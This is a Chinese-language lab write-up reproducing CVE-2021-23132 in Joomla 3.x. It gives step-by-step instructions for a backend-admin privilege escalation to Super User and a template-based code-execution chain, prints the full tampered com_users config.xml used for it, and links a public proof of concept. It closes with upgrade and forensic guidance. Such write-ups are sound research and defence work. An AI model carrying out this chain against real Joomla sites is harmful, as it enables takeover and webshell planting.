【漏洞復現 CVE-2021-23132】Joomla遠程代碼執行漏洞


0x01 描述

Joomla是一套知名的內容管理系統,其使用PHP語言和 MySQL數據庫開發,可以在Linux、 Windows、MacOSX等各種不同的平台上運行
在 Joomla 3.0.0 到 3.9.24 版本中,com_media 組件的「Path to Files Folder」配置缺乏有效校驗,後台管理員可以把媒體管理器的根目錄改成任意 Web 目錄,從而在 Web 目錄級別瀏覽、刪除和上傳文件(目錄遍歷)。攻擊者再通過一系列操作(替換 com_users 的 config.xml、創建超級管理員、編輯模板中的 PHP 文件),可進一步實現遠程代碼執行。需要注意,整條利用鏈的前提是擁有一個能登錄後台並修改 com_media 選項的帳號,它並不是未授權 RCE。

0x02 漏洞編號

CVE-2021-23132

0x03 漏洞等級

CVSS:7.5
威脅等級:高危

0x04 影響范圍

3.0.0 <= Joomla! <= 3.9.24

0x05 公開POC

https://github.com/HoangKien1020/CVE-2021-23132

0x06 漏洞復現

環境搭建

使用VULFOCUS靶場,一鍵拉取鏡像

以普通管理員身份登錄系統。切換到“media”

點擊“Options”(選項),修改 Path to Files Folder 路徑為當前路徑“./”。此時 Media Manager 的根目錄就變成了站點的 Web 根目錄。
可以看到這里可以操作整個web目錄下的文件夾及文件,實現了目錄遍歷。

在/administrator/components/com_users下,刪除config.xml文件

並重新上傳 config.xml 文件(這是 com_users 後台「Options」表單的定義文件),內容如下。與原文件相比,關鍵差異在於 new_usertype 與 guest_usergroup 兩個 usergrouplist 字段上的 checksuperusergroup="0";其餘字段只是為了讓 Options 表單仍能完整加載:

<?xml version="1.0" encoding="utf-8"?>
<config>
  <fieldset
    name="user_options"
    label="COM_USERS_CONFIG_USER_OPTIONS" >
    <!-- "User Options" tab of the com_users Options form. The two usergrouplist
         fields below carry checksuperusergroup="0"; that attribute is the reason
         this file is replaced at all (see the note on new_usertype). -->
    <field
      name="allowUserRegistration"
      type="radio"
      label="COM_USERS_CONFIG_FIELD_ALLOWREGISTRATION_LABEL"
      description="COM_USERS_CONFIG_FIELD_ALLOWREGISTRATION_DESC"
      class="btn-group btn-group-yesno"
      default="1"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

    <!-- NOTE(review): checksuperusergroup="0" is the security-relevant change.
         The write-up's next step, a non-Super-User admin creating a user that
         lands directly in a Super User group, relies on it; presumably the
         usergrouplist field type stops hiding Super User groups from the
         dropdown when this is 0. Confirm against Joomla's UsergrouplistField
         before relying on this explanation. -->
    <field
      name="new_usertype"
      type="usergrouplist"
      label="COM_USERS_CONFIG_FIELD_NEW_USER_TYPE_LABEL"
      description="COM_USERS_CONFIG_FIELD_NEW_USER_TYPE_DESC"
      default="2"
      checksuperusergroup="0"
    />

    <!-- Same checksuperusergroup="0" as above, applied to the guest group. -->
    <field
      name="guest_usergroup"
      type="usergrouplist"
      label="COM_USERS_CONFIG_FIELD_GUEST_USER_GROUP_LABEL"
      description="COM_USERS_CONFIG_FIELD_GUEST_USER_GROUP_DESC"
      default="1"
      checksuperusergroup="0"
    />

    <field
      name="sendpassword"
      type="radio"
      label="COM_USERS_CONFIG_FIELD_SENDPASSWORD_LABEL"
      description="COM_USERS_CONFIG_FIELD_SENDPASSWORD_DESC"
      class="btn-group btn-group-yesno"
      default="1"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

    <field
      name="useractivation"
      type="list"
      label="COM_USERS_CONFIG_FIELD_USERACTIVATION_LABEL"
      description="COM_USERS_CONFIG_FIELD_USERACTIVATION_DESC"
      default="0"
      >
      <option value="0">JNONE</option>
      <option value="1">COM_USERS_CONFIG_FIELD_USERACTIVATION_OPTION_SELFACTIVATION</option>
      <option value="2">COM_USERS_CONFIG_FIELD_USERACTIVATION_OPTION_ADMINACTIVATION</option>
    </field>

    <field
      name="mail_to_admin"
      type="radio"
      label="COM_USERS_CONFIG_FIELD_MAILTOADMIN_LABEL"
      description="COM_USERS_CONFIG_FIELD_MAILTOADMIN_DESC"
      class="btn-group btn-group-yesno"
      default="0"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

    <field
      name="captcha"
      type="plugins"
      label="COM_USERS_CONFIG_FIELD_CAPTCHA_LABEL"
      description="COM_USERS_CONFIG_FIELD_CAPTCHA_DESC"
      folder="captcha"
      filter="cmd"
      useglobal="true"
      >
      <option value="0">JOPTION_DO_NOT_USE</option>
    </field>

    <field
      name="frontend_userparams"
      type="radio"
      label="COM_USERS_CONFIG_FIELD_FRONTEND_USERPARAMS_LABEL"
      description="COM_USERS_CONFIG_FIELD_FRONTEND_USERPARAMS_DESC"
      class="btn-group btn-group-yesno"
      default="1"
      >
      <option value="1">JSHOW</option>
      <option value="0">JHIDE</option>
    </field>

    <field
      name="site_language"
      type="radio"
      label="COM_USERS_CONFIG_FIELD_FRONTEND_LANG_LABEL"
      description="COM_USERS_CONFIG_FIELD_FRONTEND_LANG_DESC"
      class="btn-group btn-group-yesno"
      default="0"
      showon="frontend_userparams:1"
      >
      <option value="1">JSHOW</option>
      <option value="0">JHIDE</option>
    </field>

    <field
      name="change_login_name"
      type="radio"
      label="COM_USERS_CONFIG_FIELD_CHANGEUSERNAME_LABEL"
      description="COM_USERS_CONFIG_FIELD_CHANGEUSERNAME_DESC"
      class="btn-group btn-group-yesno"
      default="0"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

  </fieldset>

  <fieldset
    name="domain_options"
    label="COM_USERS_CONFIG_DOMAIN_OPTIONS"
    >

    <!-- Domain options subform; its row definition lives in config_domain.xml.
         Not part of the exploit chain shown in this write-up; presumably kept
         only so the Options form still loads completely. -->
    <field
      name="domains"
      type="subform"
      label="COM_USERS_CONFIG_FIELD_DOMAINS_LABEL"
      description="COM_USERS_CONFIG_FIELD_DOMAINS_DESC"
      multiple="true"
      layout="joomla.form.field.subform.repeatable-table"
      formsource="administrator/components/com_users/models/forms/config_domain.xml"
    />
  </fieldset>

  <fieldset
    name="password_options"
    label="COM_USERS_CONFIG_PASSWORD_OPTIONS" >
    <!-- Password reset limits and minimum password composition rules.
         Not part of the exploit chain shown in this write-up. -->
    <field
      name="reset_count"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_FRONTEND_RESET_COUNT_LABEL"
      description="COM_USERS_CONFIG_FIELD_FRONTEND_RESET_COUNT_DESC"
      first="0"
      last="20"
      step="1"
      default="10"
    />

    <field
      name="reset_time"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_FRONTEND_RESET_TIME_LABEL"
      description="COM_USERS_CONFIG_FIELD_FRONTEND_RESET_TIME_DESC"
      first="1"
      last="24"
      step="1"
      default="1"
    />

    <field
      name="minimum_length"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_MINIMUM_PASSWORD_LENGTH"
      description="COM_USERS_CONFIG_FIELD_MINIMUM_PASSWORD_LENGTH_DESC"
      first="4"
      last="99"
      step="1"
      default="4"
    />

    <field
      name="minimum_integers"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_MINIMUM_INTEGERS"
      description="COM_USERS_CONFIG_FIELD_MINIMUM_INTEGERS_DESC"
      first="0"
      last="98"
      step="1"
      default="0"
    />

    <field
      name="minimum_symbols"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_MINIMUM_SYMBOLS"
      description="COM_USERS_CONFIG_FIELD_MINIMUM_SYMBOLS_DESC"
      first="0"
      last="98"
      step="1"
      default="0"
    />

    <field
      name="minimum_uppercase"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_MINIMUM_UPPERCASE"
      description="COM_USERS_CONFIG_FIELD_MINIMUM_UPPERCASE_DESC"
      first="0"
      last="98"
      step="1"
      default="0"
    />

    <field
      name="minimum_lowercase"
      type="integer"
      label="COM_USERS_CONFIG_FIELD_MINIMUM_LOWERCASE"
      description="COM_USERS_CONFIG_FIELD_MINIMUM_LOWERCASE_DESC"
      first="0"
      last="98"
      step="1"
      default="0"
    />

  </fieldset>

  <fieldset
    name="user_notes_history"
    label="COM_USERS_CONFIG_FIELD_NOTES_HISTORY" >

    <!-- Version history settings for user notes. Not part of the exploit
         chain shown in this write-up. -->
    <field
      name="save_history"
      type="radio"
      label="JGLOBAL_SAVE_HISTORY_OPTIONS_LABEL"
      description="JGLOBAL_SAVE_HISTORY_OPTIONS_DESC"
      class="btn-group btn-group-yesno"
      default="0"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

    <!-- Only shown when save_history is 1 (showon). -->
    <field
      name="history_limit"
      type="number"
      label="JGLOBAL_HISTORY_LIMIT_OPTIONS_LABEL"
      description="JGLOBAL_HISTORY_LIMIT_OPTIONS_DESC"
      filter="integer"
      default="5"
      showon="save_history:1"
    />

  </fieldset>

   <fieldset
    name="massmail"
    label="COM_USERS_MASS_MAIL"
    description="COM_USERS_MASS_MAIL_DESC">

    <!-- Mass mail subject prefix / body suffix. Not part of the exploit chain
         shown in this write-up. (Indentation here is uneven in the original;
         left untouched on purpose.) -->
    <field
       name="mailSubjectPrefix"
       type="text"
      label="COM_USERS_CONFIG_FIELD_SUBJECT_PREFIX_LABEL"
      description="COM_USERS_CONFIG_FIELD_SUBJECT_PREFIX_DESC"
    />

     <field
       name="mailBodySuffix"
      type="textarea"
      label="COM_USERS_CONFIG_FIELD_MAILBODY_SUFFIX_LABEL"
      description="COM_USERS_CONFIG_FIELD_MAILBODY_SUFFIX_DESC"
       rows="5"
       cols="30"
    />

  </fieldset>

  <fieldset
    name="debug"
    label="COM_USERS_DEBUG_LABEL"
    description="COM_USERS_DEBUG_DESC">

    <!-- Permission debugging toggles for users and groups. Not part of the
         exploit chain shown in this write-up. -->
    <field
      name="debugUsers"
      type="radio"
      label="COM_USERS_DEBUG_USERS_LABEL"
      description="COM_USERS_DEBUG_USERS_DESC"
      class="btn-group btn-group-yesno"
      default="1"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

    <field
      name="debugGroups"
      type="radio"
      label="COM_USERS_DEBUG_GROUPS_LABEL"
      description="COM_USERS_DEBUG_GROUPS_DESC"
      class="btn-group btn-group-yesno"
      default="1"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

  </fieldset>

  <fieldset name="integration"
    label="JGLOBAL_INTEGRATION_LABEL"
    description="COM_USERS_CONFIG_INTEGRATION_SETTINGS_DESC"
  >

    <!-- SEF routing and custom fields integration. Not part of the exploit
         chain shown in this write-up. -->
    <field
      name="integration_sef"
      type="note"
      label="JGLOBAL_SEF_TITLE"
    />

    <field
      name="sef_advanced"
      type="radio"
      class="btn-group btn-group-yesno btn-group-reversed"
      default="0"
      label="JGLOBAL_SEF_ADVANCED_LABEL"
      description="JGLOBAL_SEF_ADVANCED_DESC"
      filter="integer"
      >
      <option value="0">JGLOBAL_SEF_ADVANCED_LEGACY</option>
      <option value="1">JGLOBAL_SEF_ADVANCED_MODERN</option>
    </field>

    <field
      name="integration_customfields"
      type="note"
      label="JGLOBAL_FIELDS_TITLE"
    />

    <field
      name="custom_fields_enable"
      type="radio"
      label="JGLOBAL_CUSTOM_FIELDS_ENABLE_LABEL"
      description="JGLOBAL_CUSTOM_FIELDS_ENABLE_DESC"
      class="btn-group btn-group-yesno"
      default="1"
      >
      <option value="1">JYES</option>
      <option value="0">JNO</option>
    </field>

  </fieldset>

  <fieldset
    name="permissions"
    label="JCONFIG_PERMISSIONS_LABEL"
    description="JCONFIG_PERMISSIONS_DESC"
    >

    <!-- ACL rules editor for com_users (component section). Not modified in
         this write-up; the privilege escalation comes from the usergrouplist
         fields above, not from these rules. -->
    <field
      name="rules"
      type="rules"
      label="JCONFIG_PERMISSIONS_LABEL"
      filter="rules"
      validate="rules"
      component="com_users"
      section="component"
    />

  </fieldset>
</config>

添加新用戶時可以看到,此時能夠直接把新用戶加入超級管理員(Super Users)群組,也就是以普通管理員身份完成了到 Super User 的權限提升。

使用上一步創建的超級管理員用戶登錄後台,修改 Beez3 模板的 error.php 文件,
添加語句 phpinfo(); (此步驟只是驗證代碼執行,實戰中攻擊者寫入的會是 webshell)。

訪問http://localhost/templates/beez3/error.php,實現代碼執行

也可以使用POC來執行代碼

獲取Flag

0x07 修復建議

建議相關用戶升級到 3.9.25 及以上版本;或者登錄系統後台,系統會提示升級,點擊一下完成自動升級即可。如果懷疑已被利用,建議按本文利用鏈逐項排查:com_media 的 Path to Files Folder 是否被改成 ./ 等非 images 目錄;administrator/components/com_users/config.xml 等核心文件是否被改動(可與官方發行包比對,重點看 checksuperusergroup 屬性);Super Users 群組中是否出現不明帳號;templates 目錄下的 PHP 文件(如 error.php)是否被插入代碼。同時應盡量減少擁有後台訪問權限的帳號數量,並為後台帳號啟用雙因素認證,因為本漏洞的起點是一個已登錄的後台管理員。





 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM